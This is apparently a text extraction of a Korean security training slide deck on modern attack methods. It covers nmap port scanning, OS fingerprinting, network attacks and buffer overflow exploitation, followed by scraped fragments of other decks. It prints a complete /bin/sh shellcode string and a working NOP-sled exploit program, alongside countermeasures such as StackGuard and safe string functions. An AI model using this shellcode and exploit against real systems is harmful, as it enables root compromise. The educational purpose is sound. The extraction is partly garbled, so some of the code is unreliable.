½½¶óÀ̵å Á¦¸ñ ¾øÀ½

Size: px
Start display at page:

Download "½½¶óÀ̵å Á¦¸ñ ¾øÀ½"

Transcription

1 최신해킹공격방법의이해 조용상 Hackerslab / Intelligence 팀

2 목차 공격방법의변천시기불일치현상기술관점에따른공격기법 Scanning software 구현상의오류를이용한공격 Buffer Overflow 악의적인공격행위

3 공격방법의변천 제 1 시기 Password 수작업추측 Password 자동추측 제 2 시기제 3 시기제 4 시기제 5 시기 Command 조합에의한해킹 File Permission (setuid) Configuaration Error Environment Variable error Progeamming 에의한해킹 Race Condition Sniffing Spoofing DoS Scanning Appl Backdoor Buffer overflow Format String Kernel Backdoor worm D DoS Web Attack PC virus Window Trojan

4 공격방법의변천 P2P messenger Attack Wireless Attack DB Attack 제 6 시기 Advanced BO Attack Advanced Kernel Backdoor 지금시기는제 5 시기에서제 6 시기로변화중 Blackhat 영역의시기와 Whitehat 영역의시기의불일치현상존재

5 Blackhat & Whitehat 간의시기불일치현상 underground 에서연구하고있는해킹기법과 (black 영역 ) 실제 internet 현장 (white 영역 ) 에서대규모발생하고있는해킹기법간에는약 1 시기의차이가있다. 현재 blackhat 의집중연구분야 wireless attack DB SQL injection attack Advanced Buffer Overflow Attack (Free malloc overflow) whitehat 영역의실제피해기법 internet worm (CodeRed, nimda, Window Trojan) Distributed Denial Of Service Attack Web Application Attack ( 홈페이지공격 )

6 Blackhat & Whitehat 간의시기불일치현상 이러한시기불일치현상의결과 whitehat 영역의관심사와 blackhat 영역의관심사가다름 whitehat 영역의경우 이전시기의공격기법에대한대책에관심 blackhat 영역의경우 새로운시기의공격기법자체에대해관심 컴퓨터보안영역의이원화 보안제품개발자, 시스템네트웍관리자의경우 whitehat 영역의기술을다룬다 취약점점검, 보안진단, 버그분석자의경우 blackhat 영역의기술을다룬다 programming 에의한 hacking 이나오기시작한제 3 시기이후두영역은더욱더이원화됨

7 기술관점에따른공격기법 정보획득기법 (Scanning) Network 통신취약점을이용한공격 (TCP/IP 오류 ) System 관리잘못을이용한공격 software 구현상의오류를이용한공격 ( bug ) 은닉기법 (backdoor ) 서비스제공방해공격 (DoS) 자동공격 & 침투기법 (worm, trojan)

8 Scanning Which systems are alive and reachable? What services they offer? How can I know those? Ping sweep, Port scan OS indentification DoS와더불어서 IDS 로그발생원인의대다수를차지

9 Kind of Information Running TCP/UDP services System architecture (Intel x86, sparc) Reachable IP address Oeration System type

10 ICMP echo request ICMP is defined by RFC 792. ICMP ECHO request (ICMP type 8) Packet 을목적시스템에전송 그에대한응답으로 ICMP ECHO reply (ICMP type 0) Packet 이도달하였는지를체크 목적 IP 가살아있는지의여부를결정

11 ICMP echo request # nmap sp n /24 Starting nmap V by fyodor@insecure.org ( ) Host ( ) seems to be a subnet broadcast address (returned 1 extra pings). Still scanning it due to positive ping response from its own IP. Host ( ) appears to be up. Host ( ) appears to be up..... nmap run completed IP addresses (108 hosts up) scanned in 5 seconds

12 Port Scan Ping Sweep 이후, 목적시스템의 TCP 나 UDP 포트에연결을통해서어떤서비스가실행중이거나 listening 상태에있는지를탐지 tcp connect() scan tcp syn scan (half-open scan) stealth scan udp scan

13 TCP Sweep TCP 3-way handshaking

14 TCP connect() scan 목적시스켐의포트는 listening 상태임 SYN 패킷을목적시스템의포트에전송 목적시스템으로부터반환된패킷이 SYN/ACK 패킷인가? YES NO 반환된패킷이 RST/ACK 패킷으로예상되며목적시스켐의포트는 listening 상태가아님 ACK 를전송함으로써 three-way handshake 을종료 연결이 RESET 됨

15 TCP connect() scan Most basic form of tcp scan. need NOT root permission. scan by using many sockets in parallel. -> speedy scan. Using non-blocking I/O allows you to set a low time-out period and watch all the sockets at once. -> speedy scan. 단점은목적시스템의로그에남기때문에쉽게탐지될수있고필터링이가능

16 TCP syn scan 목적시스켐의포트는 listening 상태임 SYN 패킷을목적시스템의포트에전송 목적시스템으로부터반환된패킷이 SYN/ACK 패킷인가? YES NO 반환된패킷이 RST/ACK 패킷으로예상되며목적시스켐의포트는 listening 상태가아님 RST 패킷을목적시스템에보내어연결을해제한다. 연결이 RESET 됨

17 TCP syn scan often referred to as "half-open" scanning you don't open a full TCP connection Return SYN ACK indicates the port is listening. Return RST is indicative of a non- listener. You need root privileges to build these custom SYN packets. 로그에잡힐확률이적음.

18 Stealth scan Stealth means Null flag, No flag or code bits set. 다음셋중에하나면 Stealth scan 임. 필터링규칙을통과함 목적시스템의로그메카니즘에의해기록되지않음 일상적인사이트나네트워크트래픽에서자신을숨김

19 Stealth scan 의종류 SYN/ACK scan FIN scan XMAS scan NULL scan

20 Stealth scan 의실제기법 비정상적인 tcp 패킷을던져주고그에따른반응을수집하여 port scan. SYN/ACK, FIN, XMAS, NULL flag 패킷을보냈을때 Closed port 는 RESET 패킷으로반응 Open port 는무반응 ( 무시 ) RFC 793 의권고안 하지만 MS 등은이권고안을무시하였음

21 SYN/ACK scan 의도적으로 TCP three-way handshake 를무시 TCP three-way handshake 의첫번째단계를생략하고두번째단계인 SYN/ACK 패킷을먼저보내서그반응을통해정보를획득 Closed port Target 시스템은 SYN 패킷이전송되지않았음을알고보내어진패킷을오류로판단하여 RESET 대답 시스템의존재와해당포트가 closed 임을알수있음 Open port 보내어진 SYN/ACK 패킷무시 ( 무반응 )

22 FIN scan FIN 패킷을보낸후, 시스템의반응을통해정보를획득 Closed port Target 시스템은 SYN 패킷이전송되지않았음을알고보내어진패킷을오류로판단하여 RESET 대답 시스템의존재와해당포트가 closed 임을알수있음 Open port 보내어진 SYN/ACK 패킷무시 ( 무반응 ) # nmap sf

23 XMAS scan, NULL scan XMAS scan URG, ACK, PST, RST, SYN, FIN 플래그를모두세팅한패킷을보내는스캐닝기법 # nmap sx NULL scan 모든플래그를 Off 한패킷을보내는스캐닝기법 # nmap sn

24 UDP Scan UDP port (RFC 768) 이용 send 0 byte udp packets to each port on the target machine. ICMP port unreachable 메시지가 return 안되면해당포트가 reachable 하다고판단.(open port 라고판단 ) 신뢰성이적음 lost UDP 재전송기능필요

25 UDP Scan Useful to scan solaris RPCbind port, which is hided on an undocumented UDP port somewhere above sunrpc(111 tcp) port 가 block 되어있어도가능. # nmap su Starting nmap V by fyodor@insecure.org ( ) Interesting ports on (The 1429 ports scanned but not shown below are in state: closed) Port State Service 32771/udp open sometimes-rpc /udp open sometimes-rpc /udp open sometimes-rpc /udp open sometimes-rpc18

26 Port scan 의보조기법 Random port scan 순차적인포트연결시도탈피 Slow scan 룰셋시간내시도패킷수를최소화 Fragmentation scan Decoy scan Coordinated scan

27 OS Identification Banner Grabbing ALZZA Linux release 6.0 (May the Force be with you) Kernel on an i586 login: # echo 'GET / HTTP/1.0\n' nc hotbot.com 80 egrep '^Server:' Server: Microsoft-IIS/4.0 TCP/IP Stack Fingerprinting TCP 스택을구현할때, 각 OS vendor 별로조금씩수치가다르게구현된것을이용하여특정 TCP 패킷을보내고반환되는응답을관찰하여원격시스템의운영체제를알아내는기법 # nmap O TCP Sequence Prediction: Class=random positive increments Difficulty= (Good luck!) Remote operating system guess: Linux

28 TCP/IP Stack Fingerprinting FIN probe Bogus flag probe TCP Initial sequence number sampling Don't Fragment Bit TCP Initial Window ACK Value ICMP Error Message Quenching ICMP Message Quoting ICMP Error Message Echoing Integrity Type of Service (TOS) Fragmentation Handling TCP options

29 TCP initial number sampling 연결요청에응답할때 TCP 구현에따라선택되어지는 Initial sequence number 의패턴이틀림. 오래된버전의유닉스 : 64K 씩증가 FreeBSD, DG-UX, IRIX, Solaris : 시간에비례하여증가 Linux : 완전 random

30 Network 통신취약점공격 TCP/IP 의개방성과효율을위한단순함에기인한문제들 Spoofing IP Spoofing, DNS Spoofing, Domain Spoofing, ARP Spoofing Hijacking Sessiong Hijacking Sniffing Switch 환경에서의 Sniffing

31 System 관리잘못을이용한공격 Account 도용 Password Cracking File / Directory Permission Error ( 예 :.rhosts) 최근에는거의피해사례없음

32 Software 구현상의오류를이용한공격 운영체제또는 Application 을개발한개발사의프로그래머잘못에의한문제점 bug 혹은 Vulnerability 를이용한공격 Bug ( 좁은의미의 vulnerability) 1990 년이래약 5000 건의보안관련 bug 가존재 ( Hackerslab Vulnerability database) 발표되는 bug 의 95% 는 trivial 실제 whitehat 영역에서피해사례로체감할수있는 bug 는 전체발표 bug 의 5% 미만

33 Software 구현상의오류를이용한공격 whitehat 영역에서피해사례로체감 의의미 Exploit 가용이 많은시스템이이 bug 에적용 Bug 가많이알려져있음 대책을강구하기가어려움 웜형태, remote 공격, rootshell 획득공격 Hackerslab Vulnerability Expect 지수 위요소들을반영하여각 bug 의체감지수를 1~36 level 로배열 예 : CodeRed 의경우 36 level

34 Software 구현상의오류를이용한공격

35 Software 구현상의오류를이용한공격 경계영역문제 Buffer Overflow Stack Overflow Frame Pointer Overflow Heap Overflow Free Malloc Overflow 접근권한인증실패 입력데이터확인오류 Format String Attack 웹페이지파일업로드공격 웹페이지중요정보공개공격 Cross Site Script 공격 Race Condition

36 Software 구현상의오류를이용한공격 예외상황처리오류 웹페이지중요정보공개오류 실행환경오류 패키지설치당시의 configuration의오류 Object 자동실행

37 Buffer Overflow Buffer overflow? 컴파일러가배열의경계검사 (Boundary Check) 를하지않아선언된크기보다더큰데이터를기록함으로써발생되는현상 운영체제가스택이나힙영역에임의의데이터기록및실행을허용함으로써발생되는현상 Lower Memory Address Local variables (buffer area) Stack Frame Pointer Return Address Arguments Execution Stack Stack Frame Activation Record

38 함수의리턴주소변경ret Buffer Overflow 공격의대상 취약점이있는서버데몬및시스템관리프로그램 주로 root 소유의 suid 프로그램 공격의절차 취약점탐지및정보수집 OS, Program, Version, etc Exploit code from the well-known security portal sites 혹은직접 Exploit 프로그램작성 로컬및리모트공격용쉘코드작성 Let s exploit! text data buffer (our code) sfp parameters...

39 Buffer Overflow 의이해 $ cat overflow.c void main () { char buffer[16]; printf ( "Input : " ); scanf ( "%s", buffer ); printf ( "Output : %s\n", buffer ); } $./overflow Input : Output : $./overflow Input : Output : Segmentation fault Why?

40 Intel Architecture32 CPU Stack? 연속된메모리공간으로서 Last In First Out (LIFO) 구조 함수의인자및결과값전달및지역변수용으로사용 메모리영역중에서최상위부분에위치 메모리하단방향으로증가 IA-32 에서는 4 바이트씩정렬 따라서 1 바이트변수도스택 4 바이트사용 Registers ESP - 스택의 Top 을가리킴 EBP - 호출된 procedure 를위한스택프레임내의고정 reference point 를나타냄. 저장된이전의 EBP 값을 sfp 라고함 EIP - 다음에수행할명령어의위치를가리킴

41 Stack Structure 0x code data bss bss.. stack arguments environment program name null null 0xbfffffff Lower Memory Address Local variables (buffer area) Stack Frame Pointer Return Address Arguments Execution Stack Stack Frame Activation Record

42 Overflow 전 Stack Structure Overflow 후 32 bit 32 bit buffer buffer 16 bytes buffer buffer 16 bytes sfp sfp ret ret 4 bytes 4 bytes sfp sfp ret ret 4 bytes 4 bytes To main????

43 void function (int a, int b, int c) { char buffer1 [ 5 ]; char buffer2 [ 10 ]; int *ret; } ret = buffer1 + 12; (*ret) += 8; void main() { Return Address 의조작 Ret addr 의조작에의한흐름제어 buffer2 buffer1 sfp ret 12 bytes 8 bytes 4 bytes int x; } x = 0; function ( 1, 2, 3); x = 1; printf ( "%d\n", x );

44 Spanwing Shell Code shellcode 란? /bin/sh 를실행시키는기계어코드 shellcode 특징 메모리상의 shellcode 의위치를모르므로상대번지만사용 NULL 문자는버퍼에복사되지않으므로 0x00 코드는다른해당기계어코드로대체 CPU 마다다르게제작 buffer jump our code call /bin/sh sfp ret parameters

45 Spawning Shell Code Shell code의원형 완성된 shell code #include #include <stdio.h> jmp <stdio.h> jmp 0x1f 0x1f # 2 bytes bytes popl popl %esi %esi # 1 byte byte void void main() movl main() movl %esi,0x8(%esi) # 3 bytes bytes { xorl xorl %eax,%eax %eax,%eax # 2 bytes bytes char char *name[2]; movb *name[2]; movb %eax,0x7(%esi) # 3 bytes bytes movl movl %eax,0xc(%esi) # 3 bytes bytes name[0] name[0] = /bin/sh ; movb /bin/sh ; movb $0xb,%al $0xb,%al # 2 bytes bytes name[1] name[1] = NULL; movl NULL; movl %esi,%ebx %esi,%ebx # 2 bytes bytes execve(name[0],name,null); leal leal 0x8(%esi),%ecx # 3 bytes bytes leal leal 0xc(%esi),%edx # 3 bytes bytes int int $0x80 $0x80 # 2 bytes bytes xorl xorl %ebx,%ebx %ebx,%ebx # 2 bytes bytes movl movl %ebx,%eax %ebx,%eax # 2 bytes bytes inc inc %eax %eax # 1 bytes bytes int int $0x80 $0x80 # 2 bytes bytes call call -0x24-0x24 # 5 bytes bytes.string.string\"/bin/sh\ # 8 bytes bytes

46 Buffer Overflow 원리 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i];

47 실전에서의 Buffer Overflow 정확한 ret addr 을구하기힘들기때문에 NOP 코드를이용 buffer NOP NOP NOP... our code call /bin/sh sfp ret Q: Where is our code? A: Maybe parameters

48 실전 Buffer Overflow #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = \xeb\x1f\x5e\x89\x76\x08\x31\xc0 \x88\x46\x07\x89\x46\x0c\xb0\x0b \x89\xf3\x8d\x4e\x08\x8d\x56\x0c \xcd\x80\x31\xdb\x89\xd8\x40\xcd \x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { asm ("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=default_offset; int bsize=default_buffer_size; int i; if (argc > 1) bsize=atoi(argv[1]); if (argc > 2) offset=atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("using address:0x%x\n",addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) (strlen(shellcode)/2)); for (i=0; i<strlen(shellcode);i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"egg=",4); putenv(buff); system("/bin/bash"); }

49 Buffer Overflow 대책 운영체제커널패치 사용자스택영역에데이터기록금지 함수로부터복귀할때스택의무결성 (integrity) 검사 코드수행금지 Linux Kernel patch from the Openwall Project Solaris 2.6 이상버젼 : prevent and log stack-smashing attack /etc/system 수정 set noexec_user_stack = 1 set noexec_user_stack_log = 1

50 Buffer Overflow 대책 경계검사를하는컴파일러및링크사용 GNU GCC 버전을패치한 StackGuard 복귀주소다음에 canary word 를위치시킴 canary word 가변경되면스택오버플로우공격의시도감지및보고 (syslog), 시스템종료. Random canary» 실행할때마다 canary value 를변경시켜, 공격자가예측하지못하도록함 Null canary(0x ),» 공격자가버퍼에널문자 (0x00) 를넣을수없다는점을이용 Terminator canary(combination of Null, CR, LF, -l)» NULL 문자로끝나지않는몇몇문자열함수의문자열끝문자이용

51 Buffer Overflow 대책 즉각적인보안패치 RedHat Linux MS BSD 관련 Sun Solaris Digital ftp://ftp.compaq.com/pub HP/UX IBM AIX ftp://software.watson.ibm.com/pub SGI IRIX ftp://ftp.sgi.com/security

52 Buffer Overflow 원천방지 프로그래머의관점에서의보안대책 Boundary 를검사하는컴파일러및링커사용 Boundary 를검사하는함수사용 사용자제함수들 strcat(), strcpy(), gets(), scanf(), sscanf(), vscanf(), vsscanf(), sprintf(), vsprintf(), gethostbyname() 사용권장함수들 strncat(), strncpy(), fgets(), fscanf(), vfscanf(), snprintf(), vsnprintf() Overflow_wrapper 사용 AUSCERT : overflow_wrapper.c ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper.c 버퍼크기검사후원래의프로그램수행

53 Buffer Overflow 원천방지 Example of Vulnerable Program Example of Secure Program (patch) insecure.c #include <stdio.h> #include <string.h> #include <ctype.h> int main(int argc, char **argv) { char buffer[1024]; if(argc > 1) { strcpy(buffer, argv[1]); } printf( buffer: %s\n,buffer); } secure1.c #include <stdio.h> #include <string.h> #include <ctype.h> #include <stdlib.h> int main(int argc, char **argv) { char buffer[1024]; int i; if(argc > 1) { if(strlen(argv[1]) >=1023) { fprintf(stderr, too long\n ); exit(0); } strcpy(buffer, argv[1]); } printf( buffer: %s\n, buffer); }

54 Review : Buffer Overflow 버퍼오버플로우공격의위험성 리모트혹은로컬에서인증절차없이임의의권한획득 손쉽게구할수있는수없이많은 exploit 코드존재 원인 운영체제 : 스택혹은힙영역에데이터쓰기및실행허용 컴파일러 : 버퍼의경계검사소홀 프로그래머 : 버퍼의경계검사소홀및적절한함수선택에부주의 대책 운영체제 : 사용자의스택혹은힙영역의쓰기및실행권한제거 컴파일러 : 버퍼의경계검사지원 프로그래머 : 버퍼의경계검사철저, 적절한함수선택, 도구사용

55 악의적인공격행위 경유지 이용 No special target? Yes Politic, Ecomomic, Religion, Nationalism wide network scan gain any account? Remote intrusion Yes Login as account Local vulnerability? Yes No Local DoS No concentrated scan Remote vulnerability? Yes No Remote DoS root compromising 경유지 이용

56 Q & A 질문?

½½¶óÀ̵å Á¦¸ñ ¾øÀ½

½½¶óÀ̵å Á¦¸ñ ¾øÀ½ 양정규 amy@securesoft.com Securesoft / Pen-Test team 목차 공격방법의변천시기불일치현상기술관점에따른공격기법 Scanning software 구현상의오류를이용한공격 Buffer Overflow 악의적인공격행위 공격방법의변천 제 1 시기 Password 수작업추측 Password 자동추측 제 2 시기제 3 시기제 4 시기제 5

More information

hlogin2

hlogin2 0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS

More information

TCP.IP.ppt

TCP.IP.ppt TCP/IP TCP/IP TCP/IP TCP/IP TCP/IP Internet Protocol _ IP Address Internet Protocol _ Subnet Mask Internet Protocol _ ARP(Address Resolution Protocol) Internet Protocol _ RARP(Reverse Address Resolution

More information

6주차.key

6주차.key 6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running

More information

Deok9_Exploit Technique

Deok9_Exploit Technique Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security

More information

bn2019_2

bn2019_2 arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily

More information

SMB_ICMP_UDP(huichang).PDF

SMB_ICMP_UDP(huichang).PDF SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request

More information

제20회_해킹방지워크샵_(이재석)

제20회_해킹방지워크샵_(이재석) IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!

More information

1217 WebTrafMon II

1217 WebTrafMon II (1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network

More information

Microsoft Word doc

Microsoft Word doc TCP/IP 구조 1. I.P 구조설명 2. ARP 구조설명 3. TCP 구조설명 4. UDT 구조설명 5. RIP 구조설명 6. BOOTP 구조설명 7. TFTP 구조설명 destination addr source addr type data CRC 6 6 2 46-1500 4 type 0X0800 IP datagram 2 46-1500 type 0X0806

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 (Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet

More information

Subnet Address Internet Network G Network Network class B networ

Subnet Address Internet Network G Network Network class B networ Structure of TCP/IP Internet Internet gateway (router) Internet Address Class A Class B Class C 0 8 31 0 netid hostid 0 16 31 1 0 netid hostid 0 24 31 1 1 0 netid hostid Network Address : (A) 1 ~ 127,

More information

Network seminar.key

Network seminar.key Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network

More information

*****

***** Korea Internet & Security Agency 21 2 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료:한국인터넷진흥원 인터넷침해대응센터]를 명시하여 주시기 바랍니다. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot

More information

UDP Flooding Attack 공격과 방어

UDP Flooding Attack 공격과 방어 황 교 국 (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó Korea Internet & Security Agency 21 3 CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35 1 213 Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6%

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù 21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132

More information

Microsoft PowerPoint - 4. 스캐닝-2.ppt [호환 모드]

Microsoft PowerPoint - 4. 스캐닝-2.ppt [호환 모드] 정보보호 Scanning 목차 Ⅳ. 스캐닝 (Scanning) 1. 활성화된호스트식별 ping 침투테스트범위에있는 IP주소만목록화 현재동작중인시스템확인 ping Echo request 메시지를강제종료전까지계속전송 Echo request 메시지를 4 개전송후, 자동으로종료 Ping - ICMP(Internet Control messaging Protocol)

More information

강의10

강의10 Computer Programming gdb and awk 12 th Lecture 김현철컴퓨터공학부서울대학교 순서 C Compiler and Linker 보충 Static vs Shared Libraries ( 계속 ) gdb awk Q&A Shared vs Static Libraries ( 계속 ) Advantage of Using Libraries Reduced

More information

슬라이드 1

슬라이드 1 -Part3- 제 4 장동적메모리할당과가변인 자 학습목차 4.1 동적메모리할당 4.1 동적메모리할당 4.1 동적메모리할당 배울내용 1 프로세스의메모리공간 2 동적메모리할당의필요성 4.1 동적메모리할당 (1/6) 프로세스의메모리구조 코드영역 : 프로그램실행코드, 함수들이저장되는영역 스택영역 : 매개변수, 지역변수, 중괄호 ( 블록 ) 내부에정의된변수들이저장되는영역

More information

Level 1. Trivial level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. level1]$ find / -user level2 2>/dev/null find / 최상위폴더부터찾겠다. -u

Level 1. Trivial level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. level1]$ find / -user level2 2>/dev/null find / 최상위폴더부터찾겠다. -u HackerSchool WarGame 풀이 Written by StolenByte http://stolenbyte.egloos.com - 1 - Level 1. Trivial [level1@ftz level1]$ cat hint level2 권한에 setuid 가걸린파일을찾는다. [level1@ftz level1]$ find / -user level2 2>/dev/null

More information

SYN flooding

SYN flooding Hacking & Security Frontier SecurityFirst SYN flooding - SYN flooding 공격의원리와코드그리고대응 by amur, myusgun, leemeca 2008. 09. myusgun Agenda 개요...3 원리...3 위협...4 잠깐! - 문서에관하여...4 이문서는...4 Code...4 대응방안...4 소스코드...5

More information

SRC PLUS 제어기 MANUAL

SRC PLUS 제어기 MANUAL ,,,, DE FIN E I N T R E A L L O C E N D SU B E N D S U B M O TIO

More information

*

* Korea Internet & Security Agency 29 12 CONTENTS 1 3 4 5 6 6 7 9 1 13 14 16 18 23 56 59 61 Windows XP SP1 Windows 2 SP4 1 2912 Bot 326 49 2.3 73 73 239 215 11.2% 256 199 28.6% 25 115 117.4% Bot 8,469 46

More information

PowerPoint Template

PowerPoint Template BoF 원정대서비스 목차 환경구성 http://www.hackerschool.org/hs_boards/zboard.php?id=hs_notice&no=1170881885 전용게시판 http://www.hackerschool.org/hs_boards/zboard.php?id=bof_fellowship Putty War game 2 LOB 란? 해커스쿨에서제공하는

More information

À©µµ³×Æ®¿÷ÇÁ·Î±×·¡¹Ö4Àå_ÃÖÁ¾

À©µµ³×Æ®¿÷ÇÁ·Î±×·¡¹Ö4Àå_ÃÖÁ¾ P a 02 r t Chapter 4 TCP Chapter 5 Chapter 6 UDP Chapter 7 Chapter 8 GUI C h a p t e r 04 TCP 1 3 1 2 3 TCP TCP TCP [ 4 2] listen connect send accept recv send recv [ 4 1] PC Internet Explorer HTTP HTTP

More information

Microsoft Word - FunctionCall

Microsoft Word - FunctionCall Function all Mechanism /* Simple Program */ #define get_int() IN KEYOARD #define put_int(val) LD A val \ OUT MONITOR int add_two(int a, int b) { int tmp; tmp = a+b; return tmp; } local auto variable stack

More information

C 프로그래밍 언어 입문 C 프로그래밍 언어 입문 김명호저 숭실대학교 출판국 머리말..... C, C++, Java, Fortran, Python, Ruby,.. C. C 1972. 40 C.. C. 1999 C99. C99. C. C. C., kmh ssu.ac.kr.. ,. 2013 12 Contents 1장 프로그래밍 시작 1.1 C 10 1.2 12

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

hd1300_k_v1r2_Final_.PDF

hd1300_k_v1r2_Final_.PDF Starter's Kit for HelloDevice 1300 Version 11 1 2 1 2 3 31 32 33 34 35 36 4 41 42 43 5 51 52 6 61 62 Appendix A (cross-over) IP 3 Starter's Kit for HelloDevice 1300 1 HelloDevice 1300 Starter's Kit HelloDevice

More information

untitled

untitled CAN BUS RS232 Line Ethernet CAN H/W FIFO RS232 FIFO IP ARP CAN S/W FIFO TERMINAL Emulator COMMAND Interpreter ICMP TCP UDP PROTOCOL Converter TELNET DHCP C2E SW1 CAN RS232 RJ45 Power

More information

일반적인 네트워크의 구성은 다음과 같다

일반적인 네트워크의 구성은 다음과 같다 W5200 Errata Sheet Document History Ver 1.0.0 (Feb. 23, 2012) First release (erratum 1) Ver 1.0.1 (Mar. 28, 2012) Add a solution for erratum 1, 2 Ver 1.0.2 (Apr. 03, 2012) Add a solution for erratum 3

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

chap7.key

chap7.key 1 7 C 2 7.1 C (System Calls) Unix UNIX man Section 2 C. C (Library Functions) C 1975 Dennis Ritchie ANSI C Standard Library 3 (system call). 4 C?... 5 C (text file), C. (binary file). 6 C 1. : fopen( )

More information

BMP 파일 처리

BMP 파일 처리 BMP 파일처리 김성영교수 금오공과대학교 컴퓨터공학과 학습내용 영상반전프로그램제작 2 Inverting images out = 255 - in 3 /* 이프로그램은 8bit gray-scale 영상을입력으로사용하여반전한후동일포맷의영상으로저장한다. */ #include #include #define WIDTHBYTES(bytes)

More information

침입방지솔루션도입검토보고서

